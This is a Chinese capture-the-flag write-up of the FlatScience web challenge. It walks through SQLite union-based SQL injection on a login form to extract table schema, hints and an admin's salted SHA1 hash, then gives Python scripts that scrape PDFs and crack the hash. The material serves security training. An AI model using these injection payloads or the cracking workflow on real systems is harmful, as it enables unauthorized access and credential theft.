攻防世界-web：FlatScience

题目描述

无

题目截图

解题过程

查看robots.txt

存在login.php，admin.php

dirsearch

访问login.php

查看源代码，发现提示信息

将?debug传递url，访问发现源代码

此时我们可以构造参数闭合sql语句

sql注入

sql：admin'--+
提交后发现没有报错，直接跳转到了主页面。
我们审查一下源代码：

发现这段代码是执行成功查询后，将查询结果保存在了cookie的name变量里了。
我们查看一下cookie

似乎并没有什么用啊
我们继续尝试sql注入
sql：admin' order by 1 --+

成功跳转

sql：admin' order by 2 --+
成功跳转

sql：admin' order by 3 --+

发现报错了，可以判断数据表有两列。
尝试union注入，注意用不存在的用户名进行注入，这里用admin1
sql：admin1' union select 1,2 --+

成功跳转，sql执行成功。
我们前面已经判断，sql会将结果存储在cookie的name里。所以我们查看cookie里name值。

结果为+2
也就是说我们前面sql：admin1' union select 1,2 --+ 里的2可以当作显示位。
我们尝试查看数据库名
我们知道我平时注入的一般为mysql数据库，当前数据库为SQLite3，它们的数据库结构肯定有所不同，常用函数也肯定有差异，所以这个时候需要去百度一下SQLite3如何去注入。

查看版本函数：sqlite_version()
我们去查看一下数据库版本
sql：admin1' union select 1,sqlite_version() --+

数据库版本为3.8.10.2

尝试获取表名
存储数据库信息的数据库（mysql的information_schema）：sqlite_master
字段：name #表名
字段：sql #表结构，表的字段信息都在里面，初始化数据表的sql语句
sql：admin1' union select 1,name from sqlite_master limit 0,1 --+

数据表：users
sql：admin1' union select 1,sql from sqlite_master limit 0,1 --+

发现无结果，不知道啥原因。
sql：admin1' union select 1,sql from sqlite_master limit 1,1 --+

成功取出结果，具体什么原因，可能是不同数据库不了解。
我们将结果进行url解码。
CREATE TABLE Users(id int primary key,name varchar(255),password varchar(255),hint varchar(255))
可以看出数据表Users 存在 id name password hint,四个字段，这个里面我们先看看hint字段。
sql：admin1' union select 1,hint from Users limit 0,1 --+
得到：my fav word in my fav paper?!
sql：admin1' union select 1,hint from Users limit 1,1 --+
得到：my love is…?
sql：admin1' union select 1,hint from Users limit 2,1 --+
得到：the password is password
取password
sql：admin1' union select 1,password from Users where name='admin' limit 0,1 --+

得到admin的password的sha1值为：3fab54a50e770d830c0416df817567662a9dc85c
这道题做到这里就不知到怎么继续了...
查看他人的解题，思路大概是这样的，admin账户的密码为一个单词，这个单词就在网站的某个pdf文件里，登录进去就能拿到flag。

所以解题思路来了

解题思路

1.爬取所有的pdf文件
2.提取所有pdf文件的单词
3.将单词进行加盐的sha1加密
4.与数据库中admin的sha1密码进行匹配
5.拿到密码登录admin系统

开始解题

爬取PDF文件

我不会自动爬取所有pdf文件，但是可以半自动爬取。
找出所有存在pdf的页面为：
http://124.126.19.106:30116/1/index.html
http://124.126.19.106:30116/1/2/index.html
http://124.126.19.106:30116/1/3/index.html
http://124.126.19.106:30116/1/3/6/index.html
http://124.126.19.106:30116/1/3/7/index.html
http://124.126.19.106:30116/1/2/4/index.html
http://124.126.19.106:30116/1/2/5/index.html
http://124.126.19.106:30116/1/3/7/8/index.html

python代码：

#coding:utf8
import requests
import re
import time


pdflist = []
urllist = ['http://124.126.19.106:30116/1/index.html','http://124.126.19.106:30116/1/2/index.html','http://124.126.19.106:30116/1/3/index.html','http://124.126.19.106:30116/1/3/6/index.html','http://124.126.19.106:30116/1/3/7/index.html','http://124.126.19.106:30116/1/2/4/index.html','http://124.126.19.106:30116/1/2/5/index.html','http://124.126.19.106:30116/1/3/7/8/index.html']
def gethtml(url):
	return requests.get(url).text

def getpdf(part,data):
	list = re.findall('href="(.+?)"',data)
	for i in list:
		if 'pdf' in i:
			pdflist.append(part+i)
def downfile(name,url):
	data = requests.get(url).content
	f    = open(name,'wb')
	f.write(data)
	f.close()
	print url,'\t','DOWN OK!'
name = 0
for url in urllist:
	part = url.replace('index.html','')
	getpdf(part,gethtml(url))
	time.sleep(0.3)
for i in pdflist:
	downfile(str(name)+'.pdf',i)
	time.sleep(0.3)
	name+=1
print 'ok'

执行python下载pdf文件

PDF转TXT

接下来就是提取pdf里的文本信息了，我在网上找了一个pdf转txt的工具：pdftotext.exe，这个工具可以通过命令行把pdf转txt文件，由于文件相对较多，可以通过python多线程来执行，当然也可以直接手动转换。

zhuan.py
#coding:utf8
import os
import time
import threading


def thread(cmd):
	os.system(cmd)

tsk=[]
for i in range(0,32):
	filename = str(i)+'.pdf'
	cmd = "pdftotext.exe %s"%(filename)
	t = threading.Thread(target=thread,args=(cmd,)) 
	tsk.append(t) 
for t in tsk:
	t.start()

运行时需要脚本下载好的pdf文件、pdftotext.exe在同一目录下。

提取单词爆破密码

po.py

#coding:utf8
import hashlib
import base64
def tiqu(filename):
	f = open(filename,'r')
	d = f.read()
	f.close()
	k = d.split(' ')
	n = []
	for i in k:
		i = i.replace(' ','')
		if i!='':
			n.append(i)
	return n

def sha(word):
	hexstr = hashlib.sha1(word+'Salz!').hexdigest()
	if '3fab54a50e770d830c0416df817567662a9dc85c' == hexstr:
		print '***********',word,'***********'
		exit()

for i in range(0,32):
	n = tiqu(str(i)+'.txt')
	for k in n:
		sha(k)
		print '--','\t',base64.b64encode(k)

运行时需跟生成的txt文件在同一目录

爆破密码为：ThinJerboa

在admin.php里登录

得到flag：flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}

总结

这个题难度挺大，很繁琐，对人员的编程能力有着极大的挑战。遇到这种题，不应该全部都用代码来解决，能手动处理的应该手动处理，有些功能自己不会python的可以到网上找替代工具，再利用简单的python代码同样可以实现牛逼的功能。就是把大问题切割成小问题，然后一步步解决。